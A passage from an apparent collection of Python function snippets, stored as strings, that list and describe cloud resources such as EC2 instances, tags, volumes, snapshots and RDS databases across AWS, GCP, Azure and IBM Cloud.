ContinuationToken=page['NextContinuationToken']\n )\n l |= {r['Key'] for r in page['Contents'] if r['Key'][-4:] == 'json'}\n return l", "def get_tags_for_instance(self, instance_id):\n try:\n response = self.ec2.describe_instances(InstanceIds=[instance_id])\n except Exception as e:\n logger.info(e)\n return []\n for reservation in response['Reservations']:\n for instance in reservation['Instances']:\n if instance['InstanceId'] == instance_id:\n return instance['Tags']\n return []", "def list_instances(self):\n instances = utils.list_instances(self.compute_client,\n drv_conf.resource_group)\n\n self._uuid_to_omni_instance.clear()\n instance_names = []\n for instance in instances:\n openstack_id = None\n if instance.tags and 'openstack_id' in instance.tags:\n openstack_id = instance.tags['openstack_id']\n if openstack_id is None:\n openstack_id = self._get_uuid_from_omni_id(instance.name)\n self._uuid_to_omni_instance[openstack_id] = instance\n instance_names.append(instance.name)\n return instance_names", "def get_instance_info(inst):\n instance_info = {'id': inst.id,\n 'private_ip': inst.inner_ip_address,\n 'public_ip': inst.public_ip_address,\n 'image_id': inst.image_id,\n 'zone_id': inst.zone_id,\n 'region_id': inst.region_id,\n 'launch_time': inst.creation_time,\n 'instance_type': inst.instance_type,\n 'state': inst.state,\n 'tags': inst.tags,\n # 'groups': dict((group.id, group.name) for group in inst.groups),\n # 'groups': dict((group, group) for group in inst.groups),\n 'vpc_id': inst.vpc_id,\n 'subnet_id': inst.subnet_id,\n 'vpc_private_ip': inst.vpc_private_ip,\n 'eip': inst.eip,\n 'io_optimized': inst.io_optimized\n }\n try:\n bdm_dict = {}\n bdm = getattr(inst, 'block_device_mapping')\n for device_name in bdm.keys():\n bdm_dict[device_name] = {\n 'status': bdm[device_name].status,\n 'volume_id': bdm[device_name].volume_id,\n 'delete_on_termination': bdm[device_name].delete_on_termination\n }\n instance_info['block_device_mapping'] = bdm_dict\n except AttributeError:\n instance_info['block_device_mapping'] = False\n\n return instance_info", "def __get_multi_instances(self, reservations, instance_ids=None, policies=None):\n check_instance_ids = False\n if ( instance_ids and len(instance_ids) > 0 ):\n check_instance_ids = True\n instances = [] \n for reservation in reservations:\n if check_instance_ids:\n for instance in reservation.instances:\n if instance.id in instance_ids:\n instances.append(instance)\n elif policies:\n for instance in reservation.instances:\n if 'typevm' in policies and instance.instance_type == policies['typevm']:\n instances.append(instance) \n elif policies.get('level')==1:\n if self.__compare_types_instances(policies, instance.instance_type.encode(\"latin-1\")):\n instances.append(instance)\n elif policies.get('level') == 0:\n if self.__is_adaptive_instance(self.__get_metrics_adapted(policies), instance.instance_type.encode(\"latin-1\")):\n instances.append(instance)\n else:\n instances=[]\n else:\n instances += reservation.instances\n return instances, len(instances)", "def get_all_vpc_instances ( ec2_conn, vpc ) :\n return ec2_conn.get_only_instances( filters = { \"vpc-id\" : vpc.id } )", "def regions_dict(self):\n regions_dict = dict()\n for i, r in enumerate(self.regions):\n regions_dict[getattr(r, 'ix', i)] = r\n return regions_dict", "def get_tags(instance_id=None, keyid=None, key=None, profile=None, region=None):\n tags = []\n client = _get_conn(key=key, keyid=keyid, profile=profile, region=region)\n result = client.get_all_tags(filters={\"resource-id\": instance_id})\n if result:\n for tag in result:\n tags.append({tag.name: tag.value})\n else:\n log.info(\"No tags found for instance_id %s\", instance_id)\n return tags", "def list_instances_by_tag(tag_key, tag_value):\n instances = EC2_MANAGER.list_instances_by_tag(tag_key, tag_value)\n\n print(str_sep)\n print(\"Listing EC2 instances from [{}] region with tag [{}:{}].\"\n .format(SESSION.region_name, tag_key, tag_value))\n print(\"{:20s}{:15s}{:10s}{}\".format(\"ID\", \"TYPE\", \"STATE\", \"NAME\"))\n print(str_sep)\n\n for reservations in instances['Reservations']:\n for instance in reservations['Instances']:\n name = next((item for item in instance['Tags'] if item[\"Key\"] == \"Name\"),\n {'Key': 'Name', 'Value': 'None'})\n\n print(\"{:20s}{:15s}{:10s}{}\".format(instance['InstanceId'],\n instance['InstanceType'],\n instance['State']['Name'],\n name['Value']))\n\n print(str_sep)", "def populate_volumes(self):\n print \"Populating volumes info...\"\n volumes = self.get_all_volumes()\n for i in volumes:\n\n # handle associated instance's KEEP-tag\n associated_instance_id = i.attach_data.instance_id\n\n if associated_instance_id is None: # sometimes there is no attached instance\n instance_keep_tag = \"-------no-instance-found\"\n else:\n instance_keep_tag = Ins.spreadsheet[associated_instance_id]['KEEP_tag']\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n instance_KEEP_tag=instance_keep_tag,\n associated_instance_id=associated_instance_id,\n PROD_tag=self.is_production(i), attachment_state=i.attachment_state(),\n state=i.volume_state(), status=i.status, iops=i.iops, size=i.size,\n created=i.create_time, region=i.region.name)", "def run(self):\n ilist = []\n key_filter = filters[self.args['filter_group']]\n for item in self.client.describe_instances()['Reservations']:\n for instance in item['Instances']:\n idict = {}\n for tag in instance['Tags']:\n if not any(t['Key'] == 'Name' for t in instance['Tags']):\n tag['Value'] = 'Unnamed'\n idict['Name'] = tag['Value']\n if tag['Key'] == 'Name':\n if tag['Value'] == \"\":\n tag['Value'] = 'Unnamed'\n idict['Name'] = tag['Value']\n for key in key_filter:\n try:\n if key in ['AvailabilityZone','Tenancy']:\n idict[key] = instance['Placement'][key]\n elif key == 'SecurityGroups':\n sg_list = []\n for sg in instance[key]:\n sg_list.append(sg['GroupId'])\n if self.args['output'] == 'csv':\n sg_string = \" \\n\"\n idict[key] = sg_string.join(sg_list)\n else:\n idict[key] = ','.join(sg_list)\n elif key == 'BlockDeviceMappings':\n devices = []\n for dev in instance[key]:\n devices.append(dev['DeviceName'])\n if self.args['output'] == 'csv':\n dev_string = \" \\n\"\n idict[key] = dev_string.join(devices)\n else:\n idict[key] = ','.join(devices)\n elif key == 'State':\n idict[key] = instance[key]['Name']\n else:\n if instance[key]:\n idict[key] = instance[key]\n except Exception as e:\n idict[key] = 'N/A'\n ilist.append(idict)\n self.template(self.sortList(ilist))", "def get_volumes(instance):\n if instance.cloud == 'aws':\n client = boto3.session.Session().client('ec2', instance.region)\n devices = client.describe_instance_attribute(\n InstanceId=instance.id, Attribute='blockDeviceMapping').get('BlockDeviceMappings', [])\n volumes = client.describe_volumes(VolumeIds=[device['Ebs']['VolumeId']\n for device in devices if device.get('Ebs', {}).get('VolumeId')]).get('Volumes', [])\n return {volume['Attachments'][0]['Device']: {'size': volume['Size'], 'volume_type': volume['VolumeType']} for volume in volumes}\n if instance.cloud == 'gcp':\n credentials = GoogleCredentials.get_application_default()\n compute = discovery.build('compute', 'v1', credentials=credentials)\n volumes = {}\n for disk in compute.instances().get(instance=instance.id,\n zone=instance.zone,\n project=instance.project).execute()['disks']:\n index = disk['index']\n name = disk['deviceName'] if disk['deviceName'] not in [u'persistent-disk-0', 'boot'] else instance.id\n if 'local-ssd' in disk['deviceName']:\n size = 375.0\n disk_type = 'local-ssd'\n else:\n size = float(disk.get('diskSizeGb', 0.))\n disk_type = 'pd-ssd'\n volumes[index] = {'size': size,\n 'type': disk['type'],\n 'deviceName': disk['deviceName'],\n 'interface': disk['interface'],\n 'diskType': disk_type}\n return volumes\n raise ValueError('Unknown cloud %s' % instance.cloud)", "def list_rds(region, filter_by_kwargs):\n conn = boto.rds.connect_to_region(region)\n instances = conn.get_all_dbinstances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def get_instances(instance_ids: np.ndarray, class_ids: np.ndarray,\n class_labels: List[str], id2label: Dict) -> Dict:\n assert len(class_labels) == len(class_ids)\n instances = {}\n for label in class_labels:\n instances[label] = []\n # traverse all instances\n inst_ids = np.unique(instance_ids)\n for id in inst_ids:\n # skip 0 and negative instance id (background points)\n if id <= 0:\n continue\n # get instance\n inst = VertInstance(instance_ids, id)\n # record in correspond class dict\n if inst.label_id in class_ids:\n instances[id2label[inst.label_id]].append(inst.dict)\n return instances", "def get_instances(cls):\n raise NotImplementedError", "def get_instances_by_tags(self, tags):\n return self.get_only_instances(filters={'tag:{}'.format(key): val for key, val in tags.items()})", "def Get_Running_Instances():\n ec2 = boto3.resource('ec2') \n #call the features resource from the boto3 library\n instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['pending', 'running',]},])\n #filter the instances returned using the state name\n #you can also filter using Tags by adding the filters: \n #[{'Name': 'tag-key', 'Values': ['Role','Name',]}, {'Name': 'tag-value', 'Values': ['*test*', '*TEST*',]},]\n return [instance.id for instance in instances]\n #return a liste with the ids of the instances", "def list_as_instances(access_key, secret_key, region, autoscaling_group):\n\n aws_as = init_aws_as_conn(access_key, secret_key, region)\n aws_ec2 = init_aws_ec2_conn(access_key, secret_key, region)\n autoscaling_instances = []\n\n vm = aws_as.get_all_groups([autoscaling_group])\n autoscaling_instances_id = [j.instance_id for i in vm for j in i.instances]\n\n for instance_id in autoscaling_instances_id:\n vm = boto.ec2.instance.Instance(aws_ec2)\n vm.id = instance_id\n vm.update()\n autoscaling_instances.append(vm)\n\n return autoscaling_instances", "def list_instances_detail(self):\n\n # TODO(imsplitbit): need to ask around if this is the best way to do\n # this. This causes some redundant vzlist commands as get_info is run\n # on every item returned from this command but it didn't make sense\n # to re-implement get_info as get_info_all.\n infos = []\n try:\n # get a list of CT names which will be nova friendly.\n # NOTE: This can be an issue if nova decides to change\n # the format of names. We would need to have a migration process\n # to change the names in the name field of the CTs.\n out, err = utils.execute('sudo', 'vzlist', '--all', '-o',\n 'name', '-H')\n if err:\n LOG.error(err)\n except ProcessExecutionError as err:\n LOG.error(err)\n raise exception.Error('Problem listing Vzs')\n\n for name in out.splitlines():\n name = name.split()[0]\n status = self.get_info(name)\n infos.append(driver.InstanceInfo(name, status['state']))\n\n return infos", "def list_instances(self):\n print '# AWS EC2 instances'\n self.compute.list_instances()", "def get_instances(self):\n for server in self.cs.servers.list():\n match = self.cluster_re.match(server.name)\n if match:\n for ip in server.networks['public']:\n if ip.count('.'):\n v4ip = ip\n yield (match.group('role'), v4ip)", "def create_observations_dict(instances, unprocessed_map_data):\n # print(instances)\n results = {}\n for idx in instances:\n results[idx] = {}\n if idx == instances[0]:\n tag_filter_pixel_corners = B.compute_corner_pixels(\n idx, unprocessed_map_data\n ).tolist()\n # prettified_corner_pixels = [tag_filter_pixel_corners[:2,0],tag_filter_pixel_corners[:2,1],tag_filter_pixel_corners[:2,2],tag_filter_pixel_corners[:2,3]]\n # results[idx][\"corner_pixels\"] = [pixel_pair.tolist() for pixel_pair in prettified_corner_pixels]\n results[idx][\"corner_pixels\"] = tag_filter_pixel_corners\n results[idx][\"tag_pose\"] = B.compute_tag_pose(\n idx, unprocessed_map_data\n ).tolist()\n results[idx][\"camera_pose\"] = B.compute_camera_pose(\n idx, unprocessed_map_data\n ).tolist()\n\n return results", "def list_instances(self):\n nodes = self._driver.list_nodes()\n return [[n.name, n.state, n.public_ips] for n in nodes]", "def create_instances(region_name, app_name, image_name,\n storage_enckey=None,\n s3_logs_bucket=None,\n identities_url=None,\n ssh_key_name=None,\n company_domain=None,\n ldap_host=None,\n instance_type=None,\n security_group_ids=None,\n instance_profile_arn=None,\n subnet_type=SUBNET_PRIVATE,\n subnet_id=None,\n vpc_id=None,\n vpc_cidr=None,\n tag_prefix=None,\n dry_run=False,\n template_name=None,\n ec2_client=None,\n **kwargs):\n if not instance_type:\n instance_type = 't3a.micro'\n if not template_name:\n template_name = \"%s-cloud-init-script.j2\" % app_name\n if not ec2_client:\n ec2_client = boto3.client('ec2', region_name=region_name)\n resp = ec2_client.describe_instances(\n Filters=[\n {'Name': 'tag:Name', 'Values': [\"*%s*\" % app_name]},\n {'Name': 'instance-state-name',\n 'Values': [EC2_RUNNING, EC2_STOPPED, EC2_PENDING]}])\n\n instances = None\n instance_ids = []\n stopped_instance_ids = []\n for reserv in resp['Reservations']:\n instances = reserv['Instances']\n for instance in reserv['Instances']:\n names = []\n for tag in instance['Tags']:\n if tag['Key'] == 'Name':\n names = [name.strip() for name in tag['Value'].split(',')]\n break\n if app_name not in names:\n continue\n instance_ids += [instance['InstanceId']]\n if instance['State']['Name'] == EC2_STOPPED:\n stopped_instance_ids += [instance['InstanceId']]\n if stopped_instance_ids:\n ec2_client.start_instances(\n InstanceIds=stopped_instance_ids,\n DryRun=dry_run)\n LOGGER.info(\"%s restarted instances %s for '%s'\",\n tag_prefix, stopped_instance_ids, app_name)\n if instance_ids:\n LOGGER.info(\"%s found instances %s for '%s'\",\n tag_prefix, instance_ids, app_name)\n # If instances are running and there is a message queue,\n # we assume the infrastructure for this app is ready to accept\n # containers.\n return instances\n\n search_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'templates')\n template_loader = jinja2.FileSystemLoader(searchpath=search_path)\n template_env = jinja2.Environment(loader=template_loader)\n template = template_env.get_template(template_name)\n user_data = template.render(\n logs_storage_location=\"s3://%s\" % s3_logs_bucket,\n identities_url=identities_url,\n remote_drop_repo=\"https://github.com/djaodjin/drop.git\",\n company_domain=company_domain,\n ldap_host=ldap_host,\n **kwargs)\n\n # Find the ImageId\n image_id = _get_image_id(\n image_name, instance_profile_arn=instance_profile_arn,\n ec2_client=ec2_client, region_name=region_name)\n\n if not storage_enckey:\n # Always make sure the EBS storage is encrypted.\n storage_enckey = _get_or_create_storage_enckey(\n region_name, tag_prefix, dry_run=dry_run)\n\n block_devices = [\n {\n # `DeviceName` is required and must match expected name otherwise\n # an extra disk is created.\n 'DeviceName': '/dev/xvda', # XXX '/dev/sda1',\n #'VirtualName': 'string',\n # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-volume-types.html\n 'Ebs': {\n 'DeleteOnTermination': False,\n #'Iops': 100, # 'not supported for gp2'\n #'SnapshotId': 'string',\n 'VolumeSize': 8,\n 'VolumeType': 'gp2'\n },\n #'NoDevice': 'string'\n },\n ]\n if storage_enckey:\n # XXX Haven't been able to use the key we created but the default\n # aws/ebs is OK...\n for block_device in block_devices:\n block_device['Ebs'].update({\n 'KmsKeyId': storage_enckey,\n 'Encrypted': True\n })\n\n network_interfaces = [{\n 'DeviceIndex': 0,\n 'SubnetId': subnet_id,\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n 'Groups': security_group_ids\n }]\n if not subnet_id:\n if not vpc_id:\n vpc_id, _ = _get_vpc_id(tag_prefix, ec2_client=ec2_client,\n region_name=region_name)\n web_subnet_cidrs, dbs_subnet_cidrs, app_subnet_cidrs = _split_cidrs(\n vpc_cidr, ec2_client=ec2_client, region_name=region_name)\n if subnet_type == SUBNET_PRIVATE:\n app_subnet_by_cidrs = _get_subnet_by_cidrs(\n app_subnet_cidrs, tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(app_subnet_by_cidrs.values()))['SubnetId']\n elif subnet_type == SUBNET_DBS:\n dbs_subnet_by_cidrs = _get_subnet_by_cidrs(\n dbs_subnet_cidrs, tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(dbs_subnet_by_cidrs.values()))['SubnetId']\n elif subnet_type in [SUBNET_PUBLIC_READY, SUBNET_PUBLIC]:\n web_subnet_by_cidrs = _get_subnet_by_cidrs(\n web_subnet_cidrs, tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(web_subnet_by_cidrs.values()))['SubnetId']\n if subnet_type == SUBNET_PUBLIC:\n network_interfaces = [{\n 'AssociatePublicIpAddress': True,\n 'DeviceIndex': 0,\n 'SubnetId': subnet_id,\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n 'Groups': security_group_ids\n }]\n\n if not instances or not instance_ids:\n for _ in range(0, NB_RETRIES):\n # The IAM instance profile take some time to be visible.\n try:\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n resp = ec2_client.run_instances(\n BlockDeviceMappings=block_devices,\n ImageId=image_id,\n KeyName=ssh_key_name,\n InstanceType=instance_type,\n MinCount=1,\n MaxCount=1,\n#botocore.exceptions.ClientError: An error occurred (InvalidParameterCombination) when calling the RunInstances operation: Network interfaces and an instance-level subnet ID may not be specified on the same request\n# SubnetId=subnet_id,\n# SecurityGroupIds=security_group_ids,\n IamInstanceProfile={'Arn': instance_profile_arn},\n NetworkInterfaces=network_interfaces,\n TagSpecifications=[{\n 'ResourceType': \"instance\",\n 'Tags': [{\n 'Key': 'Name',\n 'Value': app_name\n }, {\n 'Key': 'Prefix',\n 'Value': tag_prefix\n }]\n }],\n UserData=user_data,\n DryRun=dry_run)\n instances = resp['Instances']\n instance_ids = [\n instance['InstanceId'] for instance in instances]\n break\n except botocore.exceptions.ClientError as err:\n if not err.response.get('Error', {}).get(\n 'Code', 'Unknown') == 'InvalidParameterValue':\n raise\n LOGGER.info(\"%s waiting for IAM instance profile %s to be\"\\\n \" operational ...\", tag_prefix, instance_profile_arn)\n time.sleep(RETRY_WAIT_DELAY)\n LOGGER.info(\"%s started instances %s for '%s'\",\n tag_prefix, instance_ids, app_name)\n for _ in range(0, NB_RETRIES):\n # It can take some time before the instances will appear\n # in a `describe_instances` call. We want to make sure\n # not to get errors later on if we execute too fast.\n try:\n resp = ec2_client.describe_instances(InstanceIds=instance_ids)\n break\n except botocore.exceptions.ClientError as err:\n err_code = err.response.get('Error', {}).get('Code', 'Unknown')\n LOGGER.error(\"XXX err_code=%s\", err_code)\n if not err_code == 'InvalidInstanceID.NotFound':\n raise\n LOGGER.info(\"%s waiting for EC2 instances %s to be\"\\\n \" operational ...\", tag_prefix, instance_ids)\n time.sleep(RETRY_WAIT_DELAY)\n\n return instances", "def get_instances(ebs_support: str) -> Dict[str, str]:\n results = {}\n paginator = EC2_CLIENT.get_paginator(\"describe_instance_types\")\n resp_itr = paginator.paginate(\n Filters=[{\"Name\": \"ebs-info.ebs-optimized-support\", \"Values\": [ebs_support]}],\n )\n\n _type = \"false\" if ebs_support == \"unsupported\" else \"true\"\n for instances in resp_itr:\n for inst in instances.get(\"InstanceTypes\"):\n results[inst[\"InstanceType\"]] = _type\n return results", "def list_instances(self):\n LOG.debug(\"list_instances\")\n\n instance_ids = []\n bmms = db.bmm_get_all(None)\n for bmm in bmms:\n if not bmm[\"instance_id\"]:\n continue\n instance_ids.append(self._instance_id_to_name(bmm[\"instance_id\"]))\n\n return instance_ids", "def aws_instance(LOGGER, VM, TERRAFORM_SECURITY_GROUPS):\n VM_INFO = dict()\n LOGGER.info('Adding %s: %s to inventory.' %\n (VM['data_type'], VM['inventory_hostname']))\n\n VM_INFO.update(\n {\n 'inventory_hostname': VM['inventory_hostname'],\n 'ami': VM['ami'],\n 'data_type': VM['data_type'],\n 'ansible_groups': VM['ansible_groups'],\n 'availability_zone': VM['availability_zone'],\n 'instance_type': VM['instance_type'],\n 'key_name': VM['key_name'],\n 'network_interface_id': VM['network_interface_id'],\n 'private_dns': VM['private_dns'],\n 'private_ip': VM['private_ip'],\n 'public_dns': VM['public_dns'],\n 'public_ip': VM['public_ip'],\n 'subnet_id': VM['subnet_id'],\n 'target': VM['target'],\n 'vpc_security_group_ids': VM['vpc_security_group_ids']\n }\n )\n\n for VPC_SECURITY_GROUP_ID in VM['vpc_security_group_ids']:\n for SECURITY_GROUP in TERRAFORM_SECURITY_GROUPS:\n if SECURITY_GROUP['id'] == VPC_SECURITY_GROUP_ID:\n VM_INFO.update(\n {\n 'vpc_security_groups':\n SECURITY_GROUP['security_groups']\n }\n )\n\n return VM_INFO", "def list(self, filters: dict = None, state: str = None, exclude: str = None) -> list:\n date_format = '%Y-%m-%d %H:%M:%S'\n self.instances = self.ec2.instances.all()\n\n # TOREMOVE\n def __all_instances():\n # all instances without filtering\n self.instances = [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]\n\n if state:\n try:\n self.instances = self.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': [state]}])\n except IOError as e:\n raise EC2Error('Error listing instances by state {0} {1}'.format(state, e))\n\n if filters:\n # convert string into dict\n filters = literal_eval(filters)\n try:\n if not self.instances:\n self.instances = self.ec2.instances.all()\n\n self.instances = self.instances.filter(Filters=[{'Name': filters['Name'], 'Values': filters['Values']}])\n except IOError as e:\n raise EC2Error('Error listing instances with filters {0} {1}'.format(filters, e))\n\n if exclude:\n instances = []\n for i in self.instances:\n if i.id not in exclude:\n instances.append(i)\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in instances\n ]\n else:\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]", "def get_simplified_tags(self) -> Dict:\n return self.orthanc.get_instance_simplified_tags(self.identifier)", "def _get_running_ec2_instances(theargs):\n mapstr = ''\n if theargs.profile is not None:\n boto3.setup_default_session(profile_name=theargs.profile)\n ec2 = boto3.client('ec2', region_name='us-west-2')\n\n response = ec2.describe_regions()\n for region in response['Regions']:\n rname = region['RegionName']\n sys.stdout.write('Running ec2 query in region: ' + rname + '\\n')\n ec2 = boto3.client('ec2', region_name=rname)\n mapstr += 'Region: ' + rname + '\\n'\n respy = ec2.describe_instances()\n for reso in respy['Reservations']:\n for entry in reso['Instances']:\n namey = ''\n try:\n for keyval in entry['Tags']:\n if keyval['Key'] == 'Name':\n namey = keyval['Value']\n break\n except KeyError:\n pass\n\n mapstr += ('\\t\\t' + entry['PublicDnsName'] + '\\n' +\n '\\t\\tLaunch Date: ' + str(entry['LaunchTime']) +\n '\\n' + \n '\\t\\tId: ' + entry['InstanceId'] + '\\n' +\n '\\t\\tType: ' + entry['InstanceType'] + '\\n' +\n '\\t\\tName: ' + namey + '\\n' +\n '\\t\\tState: ' + entry['State']['Name'] + '\\n\\n')\n sys.stdout.write('\\nResults:\\n\\n')\n return mapstr", "def yield_instances(self, instance_filter=None):\n if instance_filter and set(\"\\\"\\\\'\").intersection(instance_filter):\n raise ValueError('Invalid instance filter: %s' % instance_filter)\n page_token = None\n while True:\n params = {'maxResults': 250}\n if instance_filter:\n params['filter'] = 'name eq \"%s\"' % instance_filter\n if page_token:\n params['pageToken'] = page_token\n resp = self.call_api('/aggregated/instances', params=params, deadline=120)\n items = resp.get('items', {})\n for zone in sorted(items):\n for instance in items[zone].get('instances', []):\n yield instance\n page_token = resp.get('nextPageToken')\n if not page_token:\n break", "def get_volumes(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_volumes = conn.get_all_volumes()\n except boto.exception.EC2ResponseError:\n return [] # This better not fail silently or I'll cut a person.\n return region_volumes", "def _process_instance(self, instance):\n instance_dict = {}\n ins_zone = instance[\"zone\"]\n instance_dict[\"zone\"] = ins_zone[\n ins_zone.index(\"zones/\") + 6:len(ins_zone)]\n instance_dict[\"name\"] = instance[\"name\"]\n instance_dict[\"cloud\"] = self.kind\n instance_dict[\"status\"] = instance[\"status\"]\n instance_dict[\"type\"] = instance[\"cpuPlatform\"]\n instance_dict[\"created\"] = instance[\"creationTimestamp\"]\n instance_dict[\"id\"] = instance[\"id\"]\n instance_dict[\"kind\"] = instance[\"kind\"]\n machineTypeUrl = instance[\"machineType\"]\n instance_dict[\"machineType\"] = machineTypeUrl[machineTypeUrl.index(\n \"machineTypes/\") + 13:len(machineTypeUrl)]\n disks = instance[\"disks\"]\n disk = disks[0]\n instance_dict[\"deviceName\"] = disk[\"deviceName\"]\n instance_dict[\"diskSizeGb\"] = disk[\"diskSizeGb\"]\n licenses = disk[\"licenses\"][0]\n instance_dict[\"sourceImage\"] = licenses[\n licenses.index(\"licenses/\") + 9:len(\n licenses)]\n instance_dict[\"diskType\"] = disk[\"type\"]\n instance_dict[\"mode\"] = disk[\"mode\"]\n instance_dict[\"modified\"] = str(DateTime.now())\n\n # Network access.\n network_config = instance[\"networkInterfaces\"]\n\n if (network_config):\n network_config = network_config[0]\n access_config = network_config[\"accessConfigs\"]\n access_config = access_config[0]\n external_ip = access_config[\"natIP\"]\n instance_dict[\"public_ip\"] = external_ip\n\n return instance_dict", "def get_used_instances(self, instance):\n\n instances = list()\n\n for el in self.net_root.iter('block'):\n inst = el.attrib['instance']\n if instance in inst:\n if len(el.getchildren()) != 0:\n instances.append(get_root_cluster(el).attrib['name'])\n\n return instances", "def list_instance_name():\n\n if request.method == \"GET\":\n with lock:\n names = list(instances.keys())\n return jsonify(names)\n return Response(status=200)", "def get_virtual_servers(configuration: Configuration,\r\n resource_group_id: str = None,\r\n name: str = None,\r\n vpc_id: str = None,\r\n vpc_name: str = None,\r\n vpc_crn: str = None) -> Dict[str, Any]:\r\n service = create_ibmcloud_api_client(configuration)\r\n try:\r\n instances = \\\r\n service.list_instances(resource_group_id=resource_group_id, name=name, vpc_id=vpc_id, vpc_crn=vpc_crn,\r\n vpc_name=vpc_name).get_result()['instances']\r\n except ApiException as e:\r\n logger.error(\"List instances failed with status code \" +\r\n str(e.code) + \": \" + e.message)\r\n return instances", "def instances(self):\n from office365.outlook.calendar.events.collection import EventCollection\n return self.properties.get('instances',\n EventCollection(self.context, ResourcePath(\"instances\", self.resource_path)))", "def describe_rds_instances(rds, account, region, output_bucket):\n rds_list = rds.describe_db_instances().get('DBInstances')\n\n for rds_obj in rds_list:\n #print rds_obj\n output_bucket.append(misc.format_line((\n misc.check_if(account.get('name')),\n misc.check_if(region.get('RegionName')),\n misc.check_if(rds_obj.get('DBSubnetGroup').get('VpcId')),\n misc.check_if(rds_obj.get('DBInstanceIdentifier')),\n misc.check_if(rds_obj.get('DBInstanceClass')),\n misc.check_if(str(rds_obj.get('PubliclyAccessible'))),\n misc.check_if(rds_obj.get('Endpoint').get('Address')),\n misc.lookup(rds_obj.get('Endpoint').get('Address')),\n misc.check_if(str(rds_obj.get('Endpoint').get('Port')))\n )))", "def load_instances_tags(instance_id=None):\n loader = TagLoader(override_instance_id=instance_id)\n return loader.load_tags()", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def describe_instances():\n # Instantiate the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n # Describe instances\n instances = ec2_resource.instances.all()\n for instance in instances:\n print('State of the instance \"' + instance.id + '\" is: \"' + instance.state['Name'] + '\"')\n return", "def get_instances(dbpath):\n odb = openOdb(path=dbpath)\n _instances = []\n for _name,_inst in odb.rootAssembly.instances.items():\n _nodes = len(_inst.nodes)\n _elements = len(_inst.elements)\n _instances.append((_name,_nodes,_elements))\n return _instances", "def list_ebss_by_instance():\n\n ec2 = u.create_ec2_resource()\n instances = [(u.seconds_from_datetime(i.launch_time), i) for i in ec2.instances.all()]\n sorted_instances = sorted(instances, key=itemgetter(0))\n\n for (seconds, instance) in sorted_instances:\n\n volumes = instance.volumes.all()\n volume_strs = []\n for v in volumes:\n volume_strs.append(\"%s (%s)\"%(v.id, v.size))\n print(\"%s: %s\" % (u.get_name(instance.tags), ','.join(volume_strs)))", "def list_instances(self):\n # list instances\n self._list_instances()", "def instances(self, alwaysIncludeEmail=None, maxAttendees=None,\r\n maxResults=None, originalStart=None, pageToken=None,\r\n showDeleted=None, timeZone=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/instances'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def reserved_compare(options):\n running_instances = defaultdict(dict)\n reserved_purchases = defaultdict(dict)\n regions = boto.ec2.regions()\n good_regions = [r for r in regions if r.name not in ['us-gov-west-1',\n 'cn-north-1']]\n for region in good_regions:\n if options.trace:\n print \" Scanning region {0}\".format(region.name)\n conn = region.connect()\n filters = {'instance-state-name': 'running'}\n zones = defaultdict(dict)\n\n if options.trace:\n print \" Fetching running instances\"\n reservations = conn.get_all_instances(filters=filters)\n for reservation in reservations:\n for inst in reservation.instances:\n if options.debug:\n print instance_string(inst, options, verbose=True)\n if inst.state != 'running':\n if options.debug:\n print \"Skip {0.id} state {0.state}\".format(inst)\n continue\n if inst.spot_instance_request_id:\n if options.debug:\n print \"Skip {0.id} has spot id {0.spot_instance_request_id}\".format(inst)\n continue\n if 'aws:autoscaling:groupName' in inst.tags:\n if options.debug:\n print \"Skip {0.id} is an autoscale instance\".format(inst)\n continue\n if inst.platform == 'Windows' or inst.platform == 'windows':\n if options.debug:\n print \"Skip {0.id} has platform {0.platform}\".format(inst)\n continue\n if inst.instance_type not in zones[inst.placement]:\n zones[inst.placement][inst.instance_type] = []\n zones[inst.placement][inst.instance_type].append(inst)\n\n if zones:\n running_instances[region.name] = zones\n\n purchased = defaultdict(dict)\n if options.trace:\n print \" Fetching reservations\"\n\n reserved = conn.get_all_reserved_instances()\n for r in reserved:\n if options.debug:\n print reservation_string(r, verbose=True)\n if r.state != 'active':\n continue\n if r.instance_tenancy != 'default':\n print 'WARNING: Non-default tenancy %s: %s' % (r.instance_tenancy, reservation_string(r))\n continue\n if r.instance_type not in purchased[r.availability_zone]:\n purchased[r.availability_zone][r.instance_type] = [r]\n else:\n purchased[r.availability_zone][r.instance_type].append(r)\n\n if purchased:\n reserved_purchases[region.name] = purchased\n\n return check_reservation_use(options, running_instances,\n reserved_purchases)", "def list_instances(self):\n instances = []\n try:\n pages = 